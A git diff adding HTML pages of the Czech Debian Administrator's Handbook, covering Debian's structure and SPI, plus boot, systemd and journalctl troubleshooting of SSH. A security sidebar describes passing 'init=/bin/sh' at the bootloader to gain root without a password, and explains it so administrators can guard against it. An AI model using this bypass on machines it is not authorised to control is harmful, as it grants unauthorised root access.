+				Tyto dílčí pohledy na Debian jsou organizovány v dobře definovaném rámci, což zaručuje bezproblémovou kompatibilitu mezi různými “sub-distribucemi”. Každá z nich se řídí obecným plánem pro vydávání nových verzí. A protože staví na stejných základech, mohou být snadno rozšířeny, dokončeny a personalizovány s aplikacemi dostupnými v repozitářích Debianu.
+			</div><a
+              id="id-1.4.4.8.7"
+              class="indexterm"></a><div
+              class="para">
+				Všechny nástroje Debianu fungují v tomto sledu: <code
+                class="command">debian-cd</code> má již dlouhou dobu povoleno vytvoření sady CD-ROM obsahujících pouze předem vybraný soubor balíků; <code
+                class="command">debian-installer</code> je také modulární instalátor, který se snadno přizpůsobí zvláštním potřebám. <code
+                class="command">APT</code> bude instalovat balíky z různých zdrojů a zároveň garantovat celkovou konzistenci systému.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>NÁSTROJ</em></span> Vytvoření CD-ROM Debianu</strong></p></div></div></div><a
+                id="id-1.4.4.8.9.2"
+                class="indexterm"></a><div
+                class="para">
+				<code
+                  class="command">debian-cd</code> vytváří ISO obrazy instalačních médií (CD, DVD, Blu-ray, atd.) připravené k použití. Jakékoliv záležitosti týkající se tohoto softwaru jsou diskutovány (v angličtině) na <code
+                  class="email"><a
+                    class="email"
+                    href="mailto:debian-cd@lists.debian.org">debian-cd@lists.debian.org</a></code> mailing listu. Tým je pod vedením Steva McIntyra, který řídí oficiální ISO stavební části Debianu.
+			</div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>ZPĚT K ZÁKLADŮM</em></span> Do každého počítače, jeho architektura</strong></p></div></div></div><div
+                class="para">
+				Termín “architektura” označuje typ počítače (mezi nejvíce známé patří Mac nebo PC). U každé architektury dělá odlišnost především její procesor, obvykle nekompatibilní s ostatními procesory. Tyto rozdíly v hardwaru obnášejí různé provozní prostředky, což vyžaduje, aby byl software kompilován specificky pro každou architekturu.
+			</div><a
+                id="id-1.4.4.8.10.3"
+                class="indexterm"></a><a
+                id="id-1.4.4.8.10.4"
+                class="indexterm"></a><div
+                class="para">
+				Většina softwaru dostupného v Debianu je napsána v přenosných programovacích jazycích: stejný zdrojový kód může být sestaven pro různé architektury. Ve skutečnosti, spustitelný binární soubor, který je kompilován pro specifickou architekturu, nebude obvykle fungovat na ostatních architekturách.
+			</div><div
+                class="para">
+				Připomeňme si, že každý program je vytvořen napsáním zdrojového kódu; tento zdrojový kód je textový soubor složený z instrukcí v daném programovacím jazyce. Než budete moci software používat, je nutné zkompilovat zdrojový kód, což znamená transformovat kód do binárního souboru (série instrukcí stroje spustitelného procesorem). Každý programovací jazyk má konkrétní kompilátor pro provedení této operace (například <code
+                  class="command">gcc</code> pro programovací jazyk C).
+			</div><a
+                id="id-1.4.4.8.10.7"
+                class="indexterm"></a><a
+                id="id-1.4.4.8.10.8"
+                class="indexterm"></a><a
+                id="id-1.4.4.8.10.9"
+                class="indexterm"></a><a
+                id="id-1.4.4.8.10.10"
+                class="indexterm"></a></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>NÁSTROJ</em></span> Instalátor</strong></p></div></div></div><a
+                id="id-1.4.4.8.11.2"
+                class="indexterm"></a><div
+                class="para">
+				<code
+                  class="command">debian-installer</code> je název instalačního programu Debianu. Jeho modulární konstrukce umožňuje použití v širokém rozsahu instalačních scénářů. Vývojové práce jsou koordinovány na <code
+                  class="email"><a
+                    class="email"
+                    href="mailto:debian-boot@lists.debian.org">debian-boot@lists.debian.org</a></code> mailing listu pod vedením Cyrila Bruleboise.
+			</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.4.4.9"></a>1.1.2. Kvalita svobodného softwaru</h3></div></div></div><div
+              class="para">
+				Debian dodržuje všechny principy svobodného softwaru a jeho nové verze nejsou uvolněny, dokud nejsou připraveny. Vývojáři nejsou nuceni stanoveným plánem spěchat kvůli splnění nějakého termínu. Lidé si často stěžují na dlouhou dobu mezi stabilními verzemi Debianu, ale tato opatrnost také zajišťuje legendární spolehlivost Debianu: dlouhé měsíce testování jsou skutečně nezbytné pro úplnou distribuci k získání štítku “stabilní”.
+			</div><div
+              class="para">
+				Debian nebude dělat kompromisy ve kvalitě: všechny známé kritické chyby jsou vyřešeny v jakékoli nové verzi, i když to vyžaduje odsunutí původně předpokládaného datum vydání.
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.4.4.10"></a>1.1.3. Právní rámec: nezisková organizace</h3></div></div></div><div
+              class="para">
+				Po právní stránce, Debian je projekt řízený Americkou neziskovou, dobrovolnickou asociací. Projekt má kolem tisíce <span
+                class="emphasis"><em>vývojářů Debianu</em></span>, ale sdružuje mnohem větší počet přispěvatelů (překladatelů, těch, co hlásí chyby, umělců, příležitostných vývojářů, atd.).
+			</div><div
+              class="para">
+				Aby se porjekt mohl uskutečnit, má Debian širokou infrastrukturu, s mnoha servery připojenými přes internet, poskytnutými velkým počtem sponzorů.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>KOMUNITA</em></span> Za Debianem, asociace SPI, a místní pobočky</strong></p></div></div></div><a
+                id="id-1.4.4.10.4.2"
+                class="indexterm"></a><a
+                id="id-1.4.4.10.4.3"
+                class="indexterm"></a><a
+                id="id-1.4.4.10.4.4"
+                class="indexterm"></a><a
+                id="id-1.4.4.10.4.5"
+                class="indexterm"></a><div
+                class="para">
+				Debian doesn't own any server in its own name, since it is only a project within the <span
+                  class="emphasis"><em>Software in the Public Interest</em></span> association, and SPI manages the hardware and financial aspects (donations, purchase of hardware, etc.). While initially created specifically for the Debian project, this association now hosts other free software projects, especially the PostgreSQL database, Freedesktop.org (project for standardization of various parts of modern graphical desktop environments, such as GNOME and KDE Plasma), and the Libre Office office suite. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://www.spi-inc.org/">http://www.spi-inc.org/</a></div>
+			</div><div
+                class="para">
+				Kromě SPI s Debianem úzce spolupracují různá místní sdružení za účelem vytváření finančních prostředků pro projekt, bez centralizace všeho v USA: v žargonu Debianu jsou označovány za “důvěryhodné organizace”. Toto uspořádání umožňuje vyhnout se neúměrným mezinárodním nákladům za převod a dobře se hodí k decentralizované povaze projektu.
+			</div><div
+                class="para">
+				While the list of trusted organizations is rather short, there are many more Debian-related associations whose goal is to promote Debian: <span
+                  class="emphasis"><em>Debian France</em></span>, <span
+                  class="emphasis"><em>Debian-ES</em></span>, <span
+                  class="emphasis"><em>debian.ch</em></span>, and others around the world. Do not hesitate to join your local association and support the project! <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="https://wiki.debian.org/Teams/Auditor/Organizations">https://wiki.debian.org/Teams/Auditor/Organizations</a></div> <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="https://france.debian.net/">https://france.debian.net/</a></div> <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://www.debian-es.org/">http://www.debian-es.org/</a></div> <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="https://debian.ch/">https://debian.ch/</a></div>
+			</div></div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.acknowledgments.html"><strong>Předcházející</strong>5. Poděkování</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.foundation-documents.html"><strong>Další</strong>1.2. Dokumenty nadace</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/unix-services.html b/tmp/cs-CZ/html/unix-services.html
new file mode 100644
index 000000000..020a3538a
--- /dev/null
+++ b/tmp/cs-CZ/html/unix-services.html
@@ -0,0 +1,668 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 9. Unix Services</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="System boot, Initscripts, SSH, Telnet, Rights, Permissions, Supervision, Inetd, Cron, Backup, Hotplug, PCMCIA, APM, ACPI" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.kernel-installation.html"
+        title="8.11. Installing a Kernel" /><link
+        rel="next"
+        href="sect.remote-login.html"
+        title="9.2. Remote Login" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/unix-services.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.kernel-installation.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.remote-login.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="unix-services"></a>Kapitola 9. Unix Services</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="unix-services.html#sect.system-boot">9.1. System Boot</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="unix-services.html#sect.systemd">9.1.1. The systemd init system</a></span></dt><dt><span
+                    class="section"><a
+                      href="unix-services.html#sect.sysvinit">9.1.2. The System V init system</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.remote-login.html">9.2. Remote Login</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.remote-login.html#sect.ssh">9.2.1. Secure Remote Login: SSH</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.remote-login.html#sect.remote-desktops">9.2.2. Using Remote Graphical Desktops</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.rights-management.html">9.3. Managing Rights</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.administration-interfaces.html">9.4. Administration Interfaces</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.administration-interfaces.html#sect.webmin">9.4.1. Administrating on a Web Interface: <code
+                        class="command">webmin</code></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.administration-interfaces.html#sect.debconf">9.4.2. Configuring Packages: <code
+                        class="command">debconf</code></a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.syslog.html">9.5. <code
+                    class="command">syslog</code> System Events</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.syslog.html#sect.syslog-principe">9.5.1. Principle and Mechanism</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.syslog.html#sect.syslog-config">9.5.2. The Configuration File</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.inetd.html">9.6. The <code
+                    class="command">inetd</code> Super-Server</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.task-scheduling-cron-atd.html">9.7. Scheduling Tasks with <code
+                    class="command">cron</code> and <code
+                    class="command">atd</code></a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.task-scheduling-cron-atd.html#sect.format-crontab">9.7.1. Format of a <code
+                        class="filename">crontab</code> File</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.task-scheduling-cron-atd.html#sect.at-command">9.7.2. Using the <code
+                        class="command">at</code> Command</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.asynchronous-task-scheduling-anacron.html">9.8. Scheduling Asynchronous Tasks: <code
+                    class="command">anacron</code></a></span></dt><dt><span
+                class="section"><a
+                  href="sect.quotas.html">9.9. Quotas</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.backup.html">9.10. Backup</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.backup.html#id-1.12.13.11">9.10.1. Backing Up with <code
+                        class="command">rsync</code></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.backup.html#id-1.12.13.12">9.10.2. Restoring Machines without Backups</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.hotplug.html">9.11. Hot Plugging: <span
+                    class="emphasis"><em>hotplug</em></span></a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.hotplug.html#id-1.12.14.2">9.11.1. Introduction</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.hotplug.html#id-1.12.14.3">9.11.2. The Naming Problem</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.hotplug.html#id-1.12.14.4">9.11.3. How <span
+                        class="emphasis"><em>udev</em></span> Works</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.hotplug.html#id-1.12.14.5">9.11.4. A concrete example</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.power-management.html">9.12. Power Management: Advanced Configuration and Power Interface (ACPI)</a></span></dt></dl></div><div
+          class="highlights"><div
+            class="para">
+		This chapter covers a number of basic services that are common to many Unix systems. All administrators should be familiar with them.
+	</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.system-boot"></a>9.1. System Boot</h2></div></div></div><a
+            id="id-1.12.4.2"
+            class="indexterm"></a><div
+            class="para">
+			When you boot the computer, the many messages scrolling by on the console display many automatic initializations and configurations that are being executed. Sometimes you may wish to slightly alter how this stage works, which means that you need to understand it well. That is the purpose of this section.
+		</div><div
+            class="para">
+			First, the BIOS takes control of the computer, detects the disks, loads the <span
+              class="emphasis"><em>Master Boot Record</em></span>, and executes the bootloader. The bootloader takes over, finds the kernel on the disk, loads and executes it. The kernel is then initialized, and starts to search for and mount the partition containing the root filesystem, and finally executes the first program — <code
+              class="command">init</code>. Frequently, this “root partition” and this <code
+              class="command">init</code> are, in fact, located in a virtual filesystem that only exists in RAM (hence its name, “initramfs”, formerly called “initrd” for “initialization RAM disk”). This filesystem is loaded in memory by the bootloader, often from a file on a hard drive or from the network. It contains the bare minimum required by the kernel to load the “true” root filesystem: this may be driver modules for the hard drive, or other devices without which the system cannot boot, or, more frequently, initialization scripts and modules for assembling RAID arrays, opening encrypted partitions, activating LVM volumes, etc. Once the root partition is mounted, the initramfs hands over control to the real init, and the machine goes back to the standard boot process.
+		</div><div
+            class="figure"><a
+              xmlns=""
+              id="figure.boot-process-systemd"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/startup-systemd.png"
+                  alt="Boot sequence of a computer running Linux with systemd" /></div></div><p
+              class="title"><strong>Obrázek 9.1. Boot sequence of a computer running Linux with systemd</strong></p></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.systemd"></a>9.1.1. The systemd init system</h3></div></div></div><div
+              class="para">
+				The “real init” is currently provided by <span
+                class="pkg pkg">systemd</span> and this section documents this init system.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>CULTURE</em></span> Before <code
+                          class="command">systemd</code></strong></p></div></div></div><div
+                class="para">
+				<code
+                  class="command">systemd</code> is a relatively recent “init system”, and although it was already available, to a certain extent, in <span
+                  class="distribution distribution">Wheezy</span>, it has only become the default in Debian <span
+                  class="distribution distribution">Jessie</span>. Previous releases relied, by default, on the “System V init” (in the <span
+                  class="pkg pkg">sysv-rc</span> package), a much more traditional system. We describe the System V init later on.
+			</div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>ALTERNATIVE</em></span> Other boot systems</strong></p></div></div></div><div
+                class="para">
+				This book describes the boot system used by default in Debian <span
+                  class="distribution distribution">Jessie</span> (as implemented by the <span
+                  class="pkg pkg">systemd</span> package), as well as the previous default, <span
+                  class="pkg pkg">sysvinit</span>, which is derived and inherited from <span
+                  class="emphasis"><em>System V</em></span> Unix systems; there are others.
+			</div><div
+                class="para">
+				<span
+                  class="pkg pkg">file-rc</span> is a boot system with a very simple process. It keeps the principle of runlevels, but replaces the directories and symbolic links with a configuration file, which indicates to <code
+                  class="command">init</code> the processes that must be started and their launch order.
+			</div><div
+                class="para">
+				The <code
+                  class="command">upstart</code> system is still not perfectly tested on Debian. It is event based: init scripts are no longer executed in a sequential order but in response to events such as the completion of another script upon which they are dependent. This system, started by Ubuntu, is present in Debian <span
+                  class="distribution distribution">Jessie</span>, but is not the default; it comes, in fact, as a replacement for <span
+                  class="pkg pkg">sysvinit</span>, and one of the tasks launched by <code
+                  class="command">upstart</code> is to launch the scripts written for traditional systems, especially those from the <span
+                  class="pkg pkg">sysv-rc</span> package.
+			</div><div
+                class="para">
+				There are also other systems and other operating modes, such as <code
+                  class="command">runit</code> or <code
+                  class="command">minit</code>, but they are relatively specialized and not widespread.
+			</div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>SPECIFIC CASE</em></span> Booting from the network</strong></p></div></div></div><div
+                class="para">
+				In some configurations, the BIOS may be configured not to execute the MBR, but to seek its equivalent on the network, making it possible to build computers without a hard drive, or which are completely reinstalled on each boot. This option is not available on all hardware and it generally requires an appropriate combination of BIOS and network card.
+			</div><div
+                class="para">
+				Booting from the network can be used to launch the <code
+                  class="command">debian-installer</code> or FAI (see <a
+                  class="xref"
+                  href="installation.html#sect.installation-methods">4.1 – „Installation Methods“</a>).
+			</div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>BACK TO BASICS</em></span> The process, a program instance</strong></p></div></div></div><a
+                id="id-1.12.4.6.6.2"
+                class="indexterm"></a><div
+                class="para">
+				A process is the representation in memory of a running program. It includes all of the information necessary for the proper execution of the software (the code itself, but also the data that it has in memory, the list of files that it has opened, the network connections it has established, etc.). A single program may be instantiated into several processes, not necessarily running under different user IDs.
+			</div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>SECURITY</em></span> Using a shell as <code
+                          class="command">init</code> to gain root rights</strong></p></div></div></div><div
+                class="para">
+				By convention, the first process that is booted is the <code
+                  class="command">init</code> program (which is a symbolic link to <code
+                  class="filename">/lib/systemd/systemd</code> by default). However, it is possible to pass an <code
+                  class="literal">init</code> option to the kernel indicating a different program.
+			</div><a
+                id="id-1.12.4.6.7.3"
+                class="indexterm"></a><div
+                class="para">
+				Any person who is able to access the computer can press the <span
+                  class="keycap"><strong>Reset</strong></span> button, and thus reboot it. Then, at the bootloader's prompt, it is possible to pass the <code
+                  class="literal">init=/bin/sh</code> option to the kernel to gain root access without knowing the administrator's password.
+			</div><div
+                class="para">
+				To prevent this, you can protect the bootloader itself with a password. You might also think about protecting access to the BIOS (a password protection mechanism is almost always available), without which a malicious intruder could still boot the machine on a removable media containing its own Linux system, which they could then use to access data on the computer's hard drives.
+			</div><div
+                class="para">
+				Finally, be aware that most BIOS have a generic password available. Initially intended for troubleshooting for those who have forgotten their password, these passwords are now public and available on the Internet (see for yourself by searching for “generic BIOS passwords” in a search engine). All of these protections will thus impede unauthorized access to the machine without being able to completely prevent it. There is no reliable way to protect a computer if the attacker can physically access it; they could dismount the hard drives to connect them to a computer under their own control anyway, or even steal the entire machine, or erase the BIOS memory to reset the password…
+			</div></div><div
+              class="para">
+				Systemd executes several processes, in charge of setting up the system: keyboard, drivers, filesystems, network, services. It does this while keeping a global view of the system as a whole, and the requirements of the components. Each component is described by a “unit file” (sometimes more); the general syntax is derived from the widely-used “*.ini files“ syntax, with <code
+                class="literal"><em
+                  class="replaceable">key</em> = <em
+                  class="replaceable">value</em></code> pairs grouped between <code
+                class="literal">[<em
+                  class="replaceable">section</em>]</code> headers. Unit files are stored under <code
+                class="filename">/lib/systemd/system/</code> and <code
+                class="filename">/etc/systemd/system/</code>; they come in several flavours, but we will focus on “services” and “targets” here.
+			</div><div
+              class="para">
+				A systemd “service file” describes a process managed by systemd. It contains roughly the same information as old-style init-scripts, but expressed in a declaratory (and much more concise) way. Systemd handles the bulk of the repetitive tasks (starting and stopping the process, checking its status, logging, dropping privileges, and so on), and the service file only needs to fill in the specifics of the process. For instance, here is the service file for SSH:
+			</div><pre
+              class="programlisting">[Unit]
+Description=OpenBSD Secure Shell server
+After=network.target auditd.service
+ConditionPathExists=!/etc/ssh/sshd_not_to_be_run
+
+[Service]
+EnvironmentFile=-/etc/default/ssh
+ExecStart=/usr/sbin/sshd -D $SSHD_OPTS
+ExecReload=/bin/kill -HUP $MAINPID
+KillMode=process
+Restart=on-failure
+
+[Install]
+WantedBy=multi-user.target
+Alias=sshd.service
+</pre><div
+              class="para">
+				As you can see, there is very little code in there, only declarations. Systemd takes care of displaying progress reports, keeping track of the processes, and even restarting them when needed.
+			</div><div
+              class="para">
+				A systemd “target file” describes a state of the system, where a set of services are known to be operational. It can be thought of as an equivalent of the old-style runlevel. One of the targets is <code
+                class="literal">local-fs.target</code>; when it is reached, the rest of the system can assume that all local filesystems are mounted and accessible. Other targets include <code
+                class="literal">network-online.target</code> and <code
+                class="literal">sound.target</code>. The dependencies of a target can be listed either within the target file (in the <code
+                class="literal">Requires=</code> line), or using a symbolic link to a service file in the <code
+                class="literal">/lib/systemd/system/<em
+                  class="replaceable">targetname</em>.target.wants/</code> directory. For instance, <code
+                class="filename">/etc/systemd/system/printer.target.wants/</code> contains a link to <code
+                class="filename">/lib/systemd/system/cups.service</code>; systemd will therefore ensure CUPS is running in order to reach <code
+                class="literal">printer.target</code>.
+			</div><div
+              class="para">
+				Since unit files are declarative rather than scripts or programs, they cannot be run directly, and they are only interpreted by systemd; several utilities therefore allow the administrator to interact with systemd and control the state of the system and of each component.
+			</div><div
+              class="para">
+				The first such utility is <code
+                class="command">systemctl</code>. When run without any arguments, it lists all the unit files known to systemd (except those that have been disabled), as well as their status. <code
+                class="command">systemctl status</code> gives a better view of the services, as well as the related processes. If given the name of a service (as in <code
+                class="command">systemctl status ntp.service</code>), it returns even more details, as well as the last few log lines related to the service (more on that later).
+			</div><div
+              class="para">
+				Starting a service by hand is a simple matter of running <code
+                class="command">systemctl start <em
+                  class="replaceable">servicename</em>.service</code>. As one can guess, stopping the service is done with <code
+                class="command">systemctl stop <em
+                  class="replaceable">servicename</em>.service</code>; other subcommands include <code
+                class="command">reload</code> and <code
+                class="command">restart</code>.
+			</div><div
+              class="para">
+				To control whether a service is active (i.e. whether it will get started automatically on boot), use <code
+                class="command">systemctl enable <em
+                  class="replaceable">servicename</em>.service</code> (or <code
+                class="command">disable</code>). <code
+                class="command">is-enabled</code> allows checking the status of the service.
+			</div><div
+              class="para">
+				An interesting feature of systemd is that it includes a logging component named <code
+                class="command">journald</code>. It comes as a complement to more traditional logging systems such as <code
+                class="command">syslogd</code>, but it adds interesting features such as a formal link between a service and the messages it generates, and the ability to capture error messages generated by its initialisation sequence. The messages can be displayed later on, with a little help from the <code
+                class="command">journalctl</code> command. Without any arguments, it simply spews all log messages that occurred since system boot; it will rarely be used in such a manner. Most of the time, it will be used with a service identifier:
+			</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>journalctl -u ssh.service
+</code></strong><code
+                class="computeroutput">-- Logs begin at Tue 2015-03-31 10:08:49 CEST, end at Tue 2015-03-31 17:06:02 CEST. --
+Mar 31 10:08:55 mirtuel sshd[430]: Server listening on 0.0.0.0 port 22.
+Mar 31 10:08:55 mirtuel sshd[430]: Server listening on :: port 22.
+Mar 31 10:09:00 mirtuel sshd[430]: Received SIGHUP; restarting.
+Mar 31 10:09:00 mirtuel sshd[430]: Server listening on 0.0.0.0 port 22.
+Mar 31 10:09:00 mirtuel sshd[430]: Server listening on :: port 22.
+Mar 31 10:09:32 mirtuel sshd[1151]: Accepted password for roland from 192.168.1.129 port 53394 ssh2
+Mar 31 10:09:32 mirtuel sshd[1151]: pam_unix(sshd:session): session opened for user roland by (uid=0)
+</code></pre><div
+              class="para">
+				Another useful command-line flag is <code
+                class="command">-f</code>, which instructs <code
+                class="command">journalctl</code> to keep displaying new messages as they are emitted (much in the manner of <code
+                class="command">tail -f <em
+                  class="replaceable">file</em></code>).
+			</div><div
+              class="para">
+				If a service doesn't seem to be working as expected, the first step to solve the problem is to check that the service is actually running with <code
+                class="command">systemctl status</code>; if it is not, and the messages given by the first command are not enough to diagnose the problem, check the logs gathered by journald about that service. For instance, assume the SSH server doesn't work:
+			</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>systemctl status ssh.service
+</code></strong><code
+                class="computeroutput">● ssh.service - OpenBSD Secure Shell server
+   Loaded: loaded (/lib/systemd/system/ssh.service; enabled)
+   Active: failed (Result: start-limit) since Tue 2015-03-31 17:30:36 CEST; 1s ago
+  Process: 1023 ExecReload=/bin/kill -HUP $MAINPID (code=exited, status=0/SUCCESS)
+  Process: 1188 ExecStart=/usr/sbin/sshd -D $SSHD_OPTS (code=exited, status=255)
+ Main PID: 1188 (code=exited, status=255)
+
+Mar 31 17:30:36 mirtuel systemd[1]: ssh.service: main process exited, code=exited, status=255/n/a
+Mar 31 17:30:36 mirtuel systemd[1]: Unit ssh.service entered failed state.
+Mar 31 17:30:36 mirtuel systemd[1]: ssh.service start request repeated too quickly, refusing to start.
+Mar 31 17:30:36 mirtuel systemd[1]: Failed to start OpenBSD Secure Shell server.
+Mar 31 17:30:36 mirtuel systemd[1]: Unit ssh.service entered failed state.
+# </code><strong
+                class="userinput"><code>journalctl -u ssh.service
+</code></strong><code
+                class="computeroutput">-- Logs begin at Tue 2015-03-31 17:29:27 CEST, end at Tue 2015-03-31 17:30:36 CEST. --
+Mar 31 17:29:27 mirtuel sshd[424]: Server listening on 0.0.0.0 port 22.
+Mar 31 17:29:27 mirtuel sshd[424]: Server listening on :: port 22.
+Mar 31 17:29:29 mirtuel sshd[424]: Received SIGHUP; restarting.
+Mar 31 17:29:29 mirtuel sshd[424]: Server listening on 0.0.0.0 port 22.
+Mar 31 17:29:29 mirtuel sshd[424]: Server listening on :: port 22.
+Mar 31 17:30:10 mirtuel sshd[1147]: Accepted password for roland from 192.168.1.129 port 38742 ssh2
+Mar 31 17:30:10 mirtuel sshd[1147]: pam_unix(sshd:session): session opened for user roland by (uid=0)
+Mar 31 17:30:35 mirtuel sshd[1180]: /etc/ssh/sshd_config line 28: unsupported option "yess".
+Mar 31 17:30:35 mirtuel systemd[1]: ssh.service: main process exited, code=exited, status=255/n/a
+Mar 31 17:30:35 mirtuel systemd[1]: Unit ssh.service entered failed state.
+Mar 31 17:30:35 mirtuel sshd[1182]: /etc/ssh/sshd_config line 28: unsupported option "yess".
+Mar 31 17:30:35 mirtuel systemd[1]: ssh.service: main process exited, code=exited, status=255/n/a
+Mar 31 17:30:35 mirtuel systemd[1]: Unit ssh.service entered failed state.
+Mar 31 17:30:35 mirtuel sshd[1184]: /etc/ssh/sshd_config line 28: unsupported option "yess".
+Mar 31 17:30:35 mirtuel systemd[1]: ssh.service: main process exited, code=exited, status=255/n/a
+Mar 31 17:30:35 mirtuel systemd[1]: Unit ssh.service entered failed state.
+Mar 31 17:30:36 mirtuel sshd[1186]: /etc/ssh/sshd_config line 28: unsupported option "yess".
+Mar 31 17:30:36 mirtuel systemd[1]: ssh.service: main process exited, code=exited, status=255/n/a
+Mar 31 17:30:36 mirtuel systemd[1]: Unit ssh.service entered failed state.
+Mar 31 17:30:36 mirtuel sshd[1188]: /etc/ssh/sshd_config line 28: unsupported option "yess".
+Mar 31 17:30:36 mirtuel systemd[1]: ssh.service: main process exited, code=exited, status=255/n/a
+Mar 31 17:30:36 mirtuel systemd[1]: Unit ssh.service entered failed state.
+Mar 31 17:30:36 mirtuel systemd[1]: ssh.service start request repeated too quickly, refusing to start.
+Mar 31 17:30:36 mirtuel systemd[1]: Failed to start OpenBSD Secure Shell server.
+Mar 31 17:30:36 mirtuel systemd[1]: Unit ssh.service entered failed state.
+# </code><strong
+                class="userinput"><code>vi /etc/ssh/sshd_config
+</code></strong><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>systemctl start ssh.service
+</code></strong><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>systemctl status ssh.service
+</code></strong><code
